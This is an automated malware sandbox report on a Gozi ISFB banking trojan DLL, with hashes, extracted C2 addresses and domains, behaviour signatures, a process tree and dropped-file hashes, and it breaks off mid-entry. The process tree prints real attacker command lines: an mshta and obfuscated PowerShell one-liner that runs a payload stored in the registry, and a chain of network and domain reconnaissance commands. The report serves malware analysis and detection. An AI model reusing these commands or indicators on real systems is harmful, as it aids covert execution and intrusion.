Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2022 10:56

General

  • Target

    8fcfb8f38d8607c57f08f9b39139065f.dll

  • Size

    300KB

  • MD5

    8fcfb8f38d8607c57f08f9b39139065f

  • SHA1

    805bb719009145dcc32b5361abf5bb4d91015dbb

  • SHA256

    ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d

  • SHA512

    6d02b5338e387185520c45a45434bf5e949fdfd66d484459c3e817b76fbfc50621d0fbd5e4e5f3618f02ea257b8d73a53637b7bc791cc40300e837e2de72007f

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 56 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3396
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3088
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1952
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3664
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2588
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:852
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"
                5⤵
                  PID:4544
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4568
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"
                  5⤵
                    PID:3680
            • C:\Windows\system32\cmd.exe
              cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4584
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic computersystem get domain
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3344
              • C:\Windows\system32\more.com
                more
                3⤵
                  PID:1984
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:4752
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                  2⤵
                    PID:4372
                  • C:\Windows\system32\cmd.exe
                    cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2816
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo.exe
                      3⤵
                      • Gathers system information
                      PID:452
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                    2⤵
                      PID:4360
                    • C:\Windows\system32\cmd.exe
                      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4180
                      • C:\Windows\system32\net.exe
                        net view
                        3⤵
                        • Discovers systems in the same network
                        PID:676
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                      2⤵
                        PID:4652
                      • C:\Windows\system32\cmd.exe
                        cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4836
                        • C:\Windows\system32\nslookup.exe
                          nslookup 127.0.0.1
                          3⤵
                            PID:3660
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                          2⤵
                            PID:3548
                          • C:\Windows\system32\cmd.exe
                            cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2040
                            • C:\Windows\system32\tasklist.exe
                              tasklist.exe /SVC
                              3⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1196
                          • C:\Windows\system32\cmd.exe
                            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                            2⤵
                              PID:3320
                            • C:\Windows\system32\cmd.exe
                              cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                              2⤵
                                PID:1300
                                • C:\Windows\system32\driverquery.exe
                                  driverquery.exe
                                  3⤵
                                    PID:4216
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                  2⤵
                                    PID:2084
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                    2⤵
                                      PID:4272
                                      • C:\Windows\system32\reg.exe
                                        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                        3⤵
                                          PID:2836
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                        2⤵
                                          PID:2564
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                          2⤵
                                            PID:1340
                                            • C:\Windows\system32\net.exe
                                              net config workstation
                                              3⤵
                                                PID:1748
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 config workstation
                                                  4⤵
                                                    PID:1732
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                2⤵
                                                  PID:4812
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                  2⤵
                                                    PID:4748
                                                    • C:\Windows\system32\nltest.exe
                                                      nltest /domain_trusts
                                                      3⤵
                                                        PID:4912
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                      2⤵
                                                        PID:4672
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                        2⤵
                                                          PID:4768
                                                          • C:\Windows\system32\nltest.exe
                                                            nltest /domain_trusts /all_trusts
                                                            3⤵
                                                              PID:5028
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                            2⤵
                                                              PID:3792
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                              2⤵
                                                                PID:2188
                                                                • C:\Windows\system32\net.exe
                                                                  net view /all /domain
                                                                  3⤵
                                                                  • Discovers systems in the same network
                                                                  PID:856
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                                2⤵
                                                                  PID:956
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                                  2⤵
                                                                    PID:4008
                                                                    • C:\Windows\system32\net.exe
                                                                      net view /all
                                                                      3⤵
                                                                      • Discovers systems in the same network
                                                                      PID:3360
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                                    2⤵
                                                                      PID:4384
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"
                                                                      2⤵
                                                                        PID:2172
                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:3520

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v6

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      b1978c722926e894cbf897ebf650ba88

                                                                      SHA1

                                                                      a9bc6f61c7f616d684cb229dd983b4e5ecb02c50

                                                                      SHA256

                                                                      a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90

                                                                      SHA512

                                                                      83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      44B

                                                                      MD5

                                                                      f7aea2435aa888b709ca20f816c33bfd

                                                                      SHA1

                                                                      38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                      SHA256

                                                                      f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                      SHA512

                                                                      1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      6bb53db491181e660601e1440f5dc723

                                                                      SHA1

                                                                      c6691aaad8c7cc09fc3166e38e5c88330c50dae7

                                                                      SHA256

                                                                      3cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59

                                                                      SHA512

                                                                      56147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      ba1cacc02ab4d42993da9e2a00150c4e

                                                                      SHA1

                                                                      a27f508c5a3ddd3c702157c07625d57a0ec44d39

                                                                      SHA256

                                                                      9c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366

                                                                      SHA512

                                                                      808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      5a48006096bd97eb23923e47e5a81f6a

                                                                      SHA1

                                                                      65d5f9e89cc05c17980eb41b0f609bf3e956bfa7

                                                                      SHA256

                                                                      889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60

                                                                      SHA512

                                                                      2d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      eb957e958d464123d032e63278336f4a

                                                                      SHA1

                                                                      327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e

                                                                      SHA256

                                                                      fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013

                                                                      SHA512

                                                                      b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      eb957e958d464123d032e63278336f4a

                                                                      SHA1

                                                                      327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e

                                                                      SHA256

                                                                      fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013

                                                                      SHA512

                                                                      b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      9KB

                                                                      MD5

                                                                      c24e1e3d7e76a3f0190c8285a952ba2d

                                                                      SHA1

                                                                      20789bba0b334b28960a0810bc099fbb5af86618

                                                                      SHA256

                                                                      071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5

                                                                      SHA512

                                                                      c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      9KB

                                                                      MD5

                                                                      c24e1e3d7e76a3f0190c8285a952ba2d

                                                                      SHA1

                                                                      20789bba0b334b28960a0810bc099fbb5af86618

                                                                      SHA256

                                                                      071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5

                                                                      SHA512

                                                                      c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      35KB

                                                                      MD5

                                                                      f2440c2ca7c021d3e23515050be042ea

                                                                      SHA1

                                                                      40dbec088209f383f75822fc17e5cec3c81b61b2

                                                                      SHA256

                                                                      e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a

                                                                      SHA512

                                                                      980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      35KB

                                                                      MD5

                                                                      f2440c2ca7c021d3e23515050be042ea

                                                                      SHA1

                                                                      40dbec088209f383f75822fc17e5cec3c81b61b2

                                                                      SHA256

                                                                      e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a

                                                                      SHA512

                                                                      980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      f2eba9bd62ee1de79653a2be84b84e82

                                                                      SHA1

                                                                      456899ba747afa3ac16412290ea9c6192b426cfd

                                                                      SHA256

                                                                      82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7

                                                                      SHA512

                                                                      3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      f2eba9bd62ee1de79653a2be84b84e82

                                                                      SHA1

                                                                      456899ba747afa3ac16412290ea9c6192b426cfd

                                                                      SHA256

                                                                      82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7

                                                                      SHA512

                                                                      3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      2fe5b90568f0224526b668dfce8690fc

                                                                      SHA1

                                                                      ddf7904e71def4524be263292b4d0f7a124021f5

                                                                      SHA256

                                                                      f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0

                                                                      SHA512

                                                                      7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      2fe5b90568f0224526b668dfce8690fc

                                                                      SHA1

                                                                      ddf7904e71def4524be263292b4d0f7a124021f5

                                                                      SHA256

                                                                      f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0

                                                                      SHA512

                                                                      7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      69d4bb4fafa07be30e9d02f144dd90df

                                                                      SHA1

                                                                      bf7b61a62183d31c1ba7a7c2fcf9cc0f8d24d9a8

                                                                      SHA256

                                                                      558f6c6bacd134f0a35dd2b278ef66feeb0bec567ebb785aea225dd90f0f564e

                                                                      SHA512

                                                                      2d64dc657ef2c929b68f861e101aa157ef77bfcf86fa21ddc8ddaa775f578f8a136b84caa6139ba7579689530914e1f0db9ed99455e103467066ba6e6781e80c

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      7772ff5dc05d71f2ad07ca8f5418a126

                                                                      SHA1

                                                                      b2fd45c5546bfb40cf4d6904a72be5fde97b4dfa

                                                                      SHA256

                                                                      1d64cbce762611d8d131d1d3b8a43c9f6722b494c3c6e5b20c0d6ae403a2556c

                                                                      SHA512

                                                                      8f1765b862d9291a13fa130ab2f4e7d096f79fd6431a93d151a1d90f6693b7c0192370c6df9af9d9bcd66264051c548c2199478ca5697cdc7168a0c5aafdfa27

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      2c329b982cf4084062d6eb587c7520ce

                                                                      SHA1

                                                                      5c1dd00777651c6822a2d10825a4f2820da2d324

                                                                      SHA256

                                                                      2f973f40a634ad144626133bd6b6e9d9517427812e342bc2e299fe1b351e7815

                                                                      SHA512

                                                                      6f7fbcf5f2c776cdbea8213565ba53a417ad88a50220d34b53c588e8c6a2bca2a3eca7580bc97786e794ddc15166df1442f0704e83469f5f48562950131ba046

                                                                    • C:\Users\Admin\AppData\Local\Temp\5197.bin1

                                                                      Filesize

                                                                      64KB

                                                                      MD5

                                                                      b1978c722926e894cbf897ebf650ba88

                                                                      SHA1

                                                                      a9bc6f61c7f616d684cb229dd983b4e5ecb02c50

                                                                      SHA256

                                                                      a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90

                                                                      SHA512

                                                                      83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES7417.tmp

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      4c841c934fa6a78ccf121587f366d0b6

                                                                      SHA1

                                                                      5a4488f8d588f94bcd62cc05baca0f9e20520784

                                                                      SHA256

                                                                      14f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7

                                                                      SHA512

                                                                      a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      392a9a94fc13026a8f63aba8c69dd50d

                                                                      SHA1

                                                                      bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa

                                                                      SHA256

                                                                      64d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70

                                                                      SHA512

                                                                      6827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197

                                                                    • C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll

                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      b7802039aed10976472f4877a76f820e

                                                                      SHA1

                                                                      f678a9ee21f18009e0f0d1ddb984e49d36e34448

                                                                      SHA256

                                                                      b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530

                                                                      SHA512

                                                                      86433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc

                                                                    • C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.dll

                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      20304a71733030087e99660755f37ccf

                                                                      SHA1

                                                                      5a67e4c45d514c3fbec6fb68efa418f01978ec5b

                                                                      SHA256

                                                                      76f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3

                                                                      SHA512

                                                                      3053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP

                                                                      Filesize

                                                                      652B

                                                                      MD5

                                                                      c4def6b5c560f90a9d42b30035510659

                                                                      SHA1

                                                                      0d04c1cbda9e499aaa1f2119f0b7b084789e4574

                                                                      SHA256

                                                                      1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0

                                                                      SHA512

                                                                      258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs

                                                                      Filesize

                                                                      400B

                                                                      MD5

                                                                      aca9704199c51fde14b8bf8165bc2a4c

                                                                      SHA1

                                                                      789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                      SHA256

                                                                      cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                      SHA512

                                                                      a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline

                                                                      Filesize

                                                                      369B

                                                                      MD5

                                                                      20b9b70df3d4658141b57560c7c22a38

                                                                      SHA1

                                                                      0a2352c94ecad22dcba6fa906f67b78dcf3deedc

                                                                      SHA256

                                                                      c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5

                                                                      SHA512

                                                                      4a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP

                                                                      Filesize

                                                                      652B

                                                                      MD5

                                                                      ba06d89e40a9d3b36e8ac118ce494371

                                                                      SHA1

                                                                      bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6

                                                                      SHA256

                                                                      fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393

                                                                      SHA512

                                                                      9b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs

                                                                      Filesize

                                                                      410B

                                                                      MD5

                                                                      9a10482acb9e6952b96f4efc24d9d783

                                                                      SHA1

                                                                      5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                      SHA256

                                                                      a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                      SHA512

                                                                      e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline

                                                                      Filesize

                                                                      369B

                                                                      MD5

                                                                      12ecb4fb620b5882813954a0dd3bbe0c

                                                                      SHA1

                                                                      8c047cfed98be681a04acc40e09928d52eab01c7

                                                                      SHA256

